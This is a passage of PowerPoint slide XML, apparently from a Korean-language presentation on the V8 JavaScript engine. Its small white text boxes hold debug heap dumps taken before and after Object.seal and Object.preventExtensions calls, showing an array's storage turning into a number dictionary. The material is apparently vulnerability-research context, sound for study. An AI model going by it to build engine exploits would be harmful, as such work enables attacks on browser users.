                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA712E4F-2761-43BC-AD34-4BE97DB9D7D3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7850459" y="1389401"/>
                <a:ext cx="1998497" cy="4893647"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][BEFORE][Object.seal(o)]  %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ FIXED_ARRAY_TYPE : 0x4c ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9928    0x26540435    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c992c    0x00000022    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9930    0x00000010    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9934    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9938    0x00000010    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c993c    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9940    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9944    0x00008484    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9948    0x00000180    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c994c    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9950    0x00000030    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][AFTER][Object.seal(o)]  %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af4    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af8    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9afc    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b00    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b04    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b08    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b0c    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b10    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b14    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b18    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b1c    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][BEFORE][Object.preventExtensions(v12)]  %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af4    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af8    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9afc    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b00    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b04    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b08    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b0c    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b10    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b14    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b18    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b1c    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][AFTER][Object.preventExtensions(v12)] %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af4    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af8    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9afc    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b00    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b04    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b08    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b0c    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b10    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b14    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b18    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b1c    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][BEFORE][Object.seal(v12)] %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af4    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af8    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9afc    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b00    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b04    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b08    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b0c    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
